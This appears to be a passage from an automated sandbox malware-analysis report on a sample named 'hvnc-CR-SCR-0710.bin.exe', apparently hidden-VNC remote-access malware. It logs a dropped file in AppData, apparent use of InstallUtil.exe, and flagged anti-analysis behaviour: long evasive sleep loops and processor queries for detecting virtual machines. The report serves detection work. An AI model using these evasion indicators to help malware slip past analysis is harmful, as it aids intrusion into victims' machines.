Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598881 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598750 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598640 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598531 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598421 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598203 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 598091 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597981 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597854 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597718 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597580 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 597362 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Window / User API: threadDelayed 1372 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Window / User API: threadDelayed 3057 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7564 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2236 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Window / User API: threadDelayed 1933 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Window / User API: threadDelayed 2454 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Window / User API: threadDelayed 1359 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Window / User API: threadDelayed 2852 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2132 Thread sleep count: 1372 > 30 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599822s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2132 Thread sleep count: 3057 > 30 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599691s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599563s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -599063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -598062s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597932s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597481s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe TID: 2676 Thread sleep time: -597374s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2800 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -37000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3604 Thread sleep count: 7564 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3604 Thread sleep count: 2236 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36890s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36781s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36671s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36562s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36453s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36317s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36181s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -36076s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35968s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35859s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35749s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35640s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35531s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35421s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35312s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35203s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -35093s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34984s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34865s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34747s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34638s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34530s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34421s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34312s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34203s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -34093s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33984s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33874s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33765s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33656s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33546s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33437s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33328s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33218s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -33109s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32999s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32890s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32781s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32671s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32562s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32447s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32343s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -32186s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -31934s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5352 Thread sleep time: -31828s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -15679732462653109s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 4428 Thread sleep count: 1933 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 4428 Thread sleep count: 2454 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599671s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599562s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599453s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599339s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599234s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599125s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -599015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598906s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598797s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598687s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598578s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598468s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598359s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -598156s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597888s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597655s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597546s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597437s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597319s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 2032 Thread sleep time: -597203s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6016 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 648 Thread sleep count: 1359 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 648 Thread sleep count: 2852 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598881s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598750s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598640s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598531s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598421s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598312s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598203s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -598091s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -597981s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -597854s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -597718s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -597580s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe TID: 5244 Thread sleep time: -597362s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3852 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599822 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599691 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599563 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598953 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598844 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598719 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598609 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598500 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598390 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598281 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598172 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 598062 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597932 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597481 Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Thread delayed: delay time: 597374 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 37000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36453 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36317 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36181 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36076 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35968 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35859 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35749 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35640 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35531 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35421 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35312 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35203 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35093 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34984 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34865 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34747 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34638 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34530 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34421 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34312 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34203 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34093 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33984 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33874 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33765 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33656 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33546 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33437 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33328 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33218 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 33109 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32999 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32890 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32781 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32447 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32343 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32186 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31934 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31828 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe Thread delayed: delay time: 599671 Jump to behavior
